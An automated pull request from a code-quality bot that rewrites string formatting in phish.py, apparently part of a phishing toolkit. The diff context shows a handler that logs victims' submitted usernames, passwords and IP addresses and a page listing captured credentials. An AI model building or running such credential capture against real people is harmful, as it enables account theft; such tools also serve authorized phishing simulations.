### PR TITLE
Fix "Prefer `format()` over string interpolation operator" issue

### DIFF
--- a/phish.py
+++ b/phish.py
@@ -85,7 +85,7 @@ class PhishDB():
         html += "[DATE], [IP], [USERNAME], [PASSWORD]\n";
         html += "------------------------------------\n";
         for row in cursor.fetchall():
-            html += '%s, %s, %s, %s\n' % (row[0], row[1], row[2], row[3])
+            html += '{0!s}, {1!s}, {2!s}, {3!s}\n'.format(row[0], row[1], row[2], row[3])
         html += "</pre>";
 
         return html
@@ -189,7 +189,7 @@ class PhishResource(resource.Resource):
         resource.Resource.__init__(self)
  
     def render(self, request):
-        subdomain = re.sub(r"\.%s$" % self.domainname, "", request.getRequestHostname())
+        subdomain = re.sub(r"\.{0!s}$".format(self.domainname), "", request.getRequestHostname())
         if (request.path == "/submit"):
             return self.captureCreds(request)
         elif ((subdomain == "" or subdomain == "www") and (request.path == "/view")):
@@ -300,7 +300,7 @@ class PhishResource(resource.Resource):
 
     def captureCreds(self, request):
         # log the credentials
-        print("::%s:: %s,[CREDENTIALS],%s,%s" % (request.getRequestHostname(),time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
+        print("::{0!s}:: {1!s},[CREDENTIALS],{2!s},{3!s}".format(request.getRequestHostname(), time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
         sys.stdout.flush()
         self.db.addLog(request.args["n"][0],request.getClientIP(),request.args["u"][0],request.args["p"][0])
         # redirect to target URL


### PR DESCRIPTION
This pull request automatically fixes all occurrences of the following issue:

Issue type: [Prefer `format()` over string interpolation operator](https://www.quantifiedcode.com/app/issue_class/4ACGxFj1)
Issue details: [https://www.quantifiedcode.com/app/project/gh:tatanus:safelogin?groups=code_patterns/%3A4ACGxFj1](https://www.quantifiedcode.com/app/project/gh:tatanus:safelogin?groups=code_patterns/%3A4ACGxFj1)

To adjust the commit message or the actual code changes, just [rebase](https://git-scm.com/docs/git-rebase) or [cherry-pick](https://git-scm.com/docs/git-cherry-pick) the commits.
For questions or feedback reach out to cody@quantifiedcode.com.

Legal note: We won't claim any copyrights on the code changes.

Cheers,
[Cody - Your code quality bot](https://www.quantifiedcode.com/cody)
